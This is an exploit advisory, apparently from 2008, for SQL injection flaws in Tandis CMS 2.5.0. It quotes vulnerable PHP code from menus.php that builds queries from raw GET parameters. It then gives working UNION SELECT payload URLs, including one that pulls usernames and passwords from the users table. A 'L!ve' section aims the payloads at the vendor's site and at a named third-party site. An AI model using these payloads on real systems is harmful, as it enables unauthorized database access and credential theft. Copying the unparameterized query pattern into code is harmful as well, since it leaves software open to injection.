Tandis CMS <= 2.5.0 Multiple Remote SQL Injection Vulnerabilities
[~] Script: Tandis CMS v2.5.0
[~] Language : PHP
[~] WebSite: http://tandiscms.com/
[~] affected File: menus.php
[~] Type : Commercial
[~] Report-Date : 27/10/2008
--[ CoDE ]--
[~] index.php
48 include("./includes/menus.php");
[~] /includes/menus.php
27 if (isset($_GET['cpage'])) {
28 $pagecode = $_GET['cpage'];
xx {...}
40 $result = mysql_query("SELECT * FROM ".$tandisversion."menus where(menuparentcode=".$pagecode." AND tid=".$_SESSION['curr_tandis_id'].")");
295 if (!isset($_GET['nid'])) {
296 print "[ERROR] You Change Standard Parameters
This System Protected By NNET SECURITY !";
297 exit();
298 }
299 $page_content = array();
300 $result = mysql_query("SELECT ".$tandisversion."tblnews.*,".$tandisversion."contents.content as cnt FROM ".$tandisversion."tblnews,".$tandisversion."contents where (nid=".$_GET['nid']." AND ".$tandisversion."tblnews.nmessage=".$tandisversion."contents.id)");
--[ /CoDE ]--
--[ DoRK ]--
sry kidz...!
no more d0rk.
--[ Founder ]--
--[ Exploit ]--
[~] http://localhost/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--
[~] http://localhost/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
--[ L!ve ]--
http://tandiscms.com/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
http://www.geomatic.ir/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
--[ Greetz ]--
[~] Tornado2800
[~] Hussain-X
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...
exit(); //EoX